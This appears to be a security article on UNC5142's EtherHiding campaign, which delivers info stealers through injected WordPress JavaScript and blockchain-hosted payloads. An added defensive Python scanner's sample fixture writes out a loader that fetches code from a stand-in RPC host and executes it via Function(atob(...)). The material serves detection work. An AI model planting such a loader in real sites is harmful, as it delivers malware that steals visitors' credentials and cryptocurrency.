Faculty of Cybersecurity Technology

UNC5142 Exploits Blockchain and WordPress to Spread Info Stealers

The financially motivated threat actor UNC5142 has been using compromised WordPress websites together with blockchain smart contracts to distribute information stealers to Windows and macOS systems. Malware families observed in the campaign include Atomic (AMOS), Lumma, Rhadamanthys (tracked as RADTHIEF) and Vidar. Using the EtherHiding technique, UNC5142 stores malicious code in smart contracts on BNB Smart Chain; because the code lives on a public chain rather than on a server that can be taken down, this gives the operator resilience, anonymity and the ability to update payloads at minimal cost.

The attack chain begins with CLEARSHORT, a JavaScript downloader injected into plugin, theme or database files on the compromised site. CLEARSHORT queries the smart contracts to retrieve a landing page that uses ClickFix social engineering: the visitor is shown a fake error or verification prompt and instructed to paste a command into the Windows Run dialog or the macOS Terminal. The resulting payload runs in memory rather than being written to disk, sidestepping file-based defenses, and ultimately delivers credential and cryptocurrency stealers.

Since November 2024, UNC5142 has used a multi-contract Router-Logic-Storage architecture, which splits the entry point, the logic and the stored payload across separate contracts, improving agility and operational resilience. The campaign has affected thousands of websites, reflecting both technical sophistication and probable success in distributing malware.
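One way to hunt for this kind of injection on a WordPress host, as an added example that is not code from the article or from any vendor report: a heuristic scanner that flags inline scripts combining an EVM contract address, an `eth_call` JSON-RPC request (or web3 library use) and a decode-and-execute step, which is the general shape of an EtherHiding loader rather than an indicator published on this page. The indicator weights, the alert threshold, the sample files and the demo contract address are all constructed assumptions of this example.

```python
"""Heuristic scan for EtherHiding-style loaders injected into WordPress files.

Added example, not code from the original article or any vendor report.
It assumes the general pattern behind the technique described above:
injected JavaScript that reads its next stage from an EVM smart contract
(an eth_call JSON-RPC request, or a web3 library, against a 0x... address)
and then decodes and executes whatever comes back. Weights, threshold,
sample inputs and the demo address are constructed for this demo.
"""
import os
import re
from dataclasses import dataclass, field
from typing import List, Optional

# 20-byte EVM address as used on BNB Smart Chain and Ethereum.
EVM_ADDRESS = re.compile(r"\b0x[0-9a-fA-F]{40}\b")

# (indicator name, pattern, weight). Weights are an assumption of this example.
INDICATORS = [
    ("contract_address", EVM_ADDRESS, 2),
    ("eth_call", re.compile(r"[\"']eth_call[\"']"), 3),
    ("web3_lib", re.compile(r"\b(?:ethers|Web3|web3)\b"), 2),
    ("jsonrpc", re.compile(r"jsonrpc\W{1,4}2\.0"), 1),
    ("decode_exec", re.compile(r"\b(?:eval|Function|atob)\s*\("), 2),
]
ALERT_THRESHOLD = 6  # constructed: address + eth_call + exec step trips it

# Inline <script> bodies inside PHP/HTML; whole-file body for .js files.
SCRIPT_TAG = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)


@dataclass
class Finding:
    path: str
    score: int
    indicators: List[str] = field(default_factory=list)
    addresses: List[str] = field(default_factory=list)


def script_bodies(path: str, text: str) -> List[str]:
    """Return the JavaScript bodies worth scoring in one file."""
    if path.lower().endswith(".js"):
        return [text]
    return SCRIPT_TAG.findall(text)


def scan_source(path: str, text: str) -> Optional[Finding]:
    """Score every script body in a file; return the highest-scoring hit."""
    best = None
    for body in script_bodies(path, text):
        hits, score = [], 0
        for name, rx, weight in INDICATORS:
            if rx.search(body):
                hits.append(name)
                score += weight
        if score >= ALERT_THRESHOLD and (best is None or score > best.score):
            best = Finding(path, score, hits, sorted(set(EVM_ADDRESS.findall(body))))
    return best


def scan_tree(root: str) -> List[Finding]:
    """Walk a WordPress install (wp-content/plugins, themes ...) and collect hits."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".php", ".js", ".html")):
                continue
            p = os.path.join(dirpath, name)
            try:
                with open(p, encoding="utf-8", errors="replace") as fh:
                    f = scan_source(p, fh.read())
            except OSError:
                continue
            if f:
                findings.append(f)
    return findings


# Constructed samples (not real malware): a clean theme footer and one with
# an EtherHiding-style loader appended. The address is a dummy value.
DEMO_ADDR = "0x" + "11" * 20

BENIGN_FOOTER = """<?php /* theme footer */ ?><script>
document.querySelectorAll('a').forEach(a => a.rel = 'noopener');
</script>"""

INJECTED_FOOTER = (
    "<?php /* theme footer */ ?><script>\n"
    "(async()=>{const r=await fetch('https://rpc.example/',{method:'POST',"
    "body:JSON.stringify({jsonrpc:'2.0',id:1,method:'eth_call',"
    "params:[{to:'" + DEMO_ADDR + "',data:'0x00'},'latest']})});"
    "const j=await r.json();Function(atob(j.result))();})();\n"
    "</script>"
)

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_FOOTER), ("injected", INJECTED_FOOTER)):
        print(label, scan_source("footer.php", sample))
```

Run `scan_tree("/var/www/html/wp-content")` on a suspect host and review every `Finding`; a legitimate crypto-wallet plugin can legitimately trip `web3_lib` and `contract_address`, which is why the exec step carries weight and why the output is a triage list, not a verdict. The scanner does not look at the database, so posts and options injected via the database path the article mentions still need a separate query over `wp_posts` and `wp_options` for `<script` content.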

16-10-2025